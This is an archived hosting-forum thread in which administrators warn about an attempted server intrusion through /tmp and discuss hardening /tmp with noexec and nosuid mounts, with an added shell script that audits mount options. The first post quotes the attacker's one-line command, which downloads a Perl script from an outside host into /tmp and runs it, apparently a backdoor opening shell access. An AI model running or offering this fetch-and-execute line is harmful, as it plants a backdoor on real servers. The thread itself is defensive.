Full Version: be aware >> tried to get in using /tmp
The Planet Forums > Security > General Security > UNIX Security
jarekb
Just to inform you there are bad guys out there


sh-ccd /tmp;wget www.eurobit.it/bd.pl;perl bd.pl


they were trying to execute this script through /tmp

good guide

http://forums.cpanel.net/showthread.php?s=...86660#post86660
dezignguy
Hmm... How was that command run? Probably through an insecure php script, right? Those PHP include exploits seem to be pretty popular now for getting into a server.

Hmm, I'm not all that great with perl, but it rather looks like this opens a port and allows (open) access to the shell through it?

You'd better check what (perl) programs are running and your /etc/services file to make sure it wasn't successfully run. I don't think the secure /tmp setting prevents perl scripts from being run in /tmp? Hmm, yep I just tried it and perl did execute my pl file in my 'secure' tmp.

I haven't registered at cpanel's forums yet though, so I may not be talking about the same thing.
bsteward
The majority of exploits I've seen using the /tmp directory included uploaded binaries. There is still a way around the noexec option with binaries, but it does make it a bit harder. Nonetheless, nothing should be executed in /tmp so there is no reason to leave that option off. I like to set nosuid as well.

mount --bind /tmp /tmp
mount -o remount,noexec,nosuid /tmp

Script kiddies will usually give up if the process is too complex to exploit ;) This is why we call them script kiddies and not hackers.

I think the only way to prevent any code from being executed in /tmp is by using ACLs (such as with grsec).
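An added example (not code from any poster in this thread) that checks whether a mount point already carries the noexec and nosuid options bsteward recommends, and prints the bind/remount commands when it does not. It parses text in /proc/mounts format; the SAMPLE_MOUNTS listing is constructed for the example, and the function names (mount_opts, missing_tmp_opts, audit_tmp) are hypothetical.

```shell
#!/bin/sh
# Audit /tmp-style mount points for noexec,nosuid (example, not from the thread).

# Print the option field (4th column) of the entry for mount point $2
# in the mounts listing $1 (/proc/mounts format). Prints nothing if absent.
mount_opts() {
    printf '%s\n' "$1" | awk -v mp="$2" '$2 == mp { print $4; exit }'
}

# Print the hardening options missing on mount point $2 of listing $1.
# Returns 0 when both noexec and nosuid are present, 1 otherwise.
# Prints "not-a-mount" when $2 is not a separate mount at all (a plain
# directory on the root filesystem cannot carry its own options).
missing_tmp_opts() {
    opts=$(mount_opts "$1" "$2")
    if [ -z "$opts" ]; then
        echo "not-a-mount"
        return 1
    fi
    missing=""
    for want in noexec nosuid; do
        case ",$opts," in
            *",$want,"*) ;;                     # option present
            *) missing="$missing $want" ;;      # option absent
        esac
    done
    missing=${missing# }
    if [ -z "$missing" ]; then
        return 0
    fi
    echo "$missing"
    return 1
}

# Constructed sample in /proc/mounts format (not output from any real host):
# /tmp is already hardened, /var/tmp is not.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda1 /tmp ext4 rw,relatime,noexec,nosuid 0 0
/dev/sdb1 /var/tmp ext4 rw,relatime 0 0'

# Report each temp directory and the remount commands needed to harden it.
audit_tmp() {
    listing=$1
    for mp in /tmp /var/tmp; do
        if result=$(missing_tmp_opts "$listing" "$mp"); then
            echo "$mp: ok"
        else
            echo "$mp: missing $result"
            echo "  fix: mount --bind $mp $mp && mount -o remount,noexec,nosuid $mp"
        fi
    done
}

# Run against the constructed sample; on a live box use: audit_tmp "$(cat /proc/mounts)"
audit_tmp "$SAMPLE_MOUNTS"
```

Note the caveat dezignguy raised above: noexec only stops the kernel from executing a file that lives on that mount, so `perl /tmp/bd.pl` still runs because the interpreter, not the file, is what gets executed. The remount is worth doing for uploaded binaries and setuid tricks, but checking for interpreter processes with a working directory in /tmp is still necessary.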
kris1351
The secured tmp will save you a lot of issues. We had someone trying to upload zbind kits last week and it blocked them from executing. I am just tempted to shut off all signups on the weekends for us. Seems 90% of the people that sign up between Friday night and Sunday morning are scammers.
Invision Power Board © 2001-2010 Invision Power Services, Inc.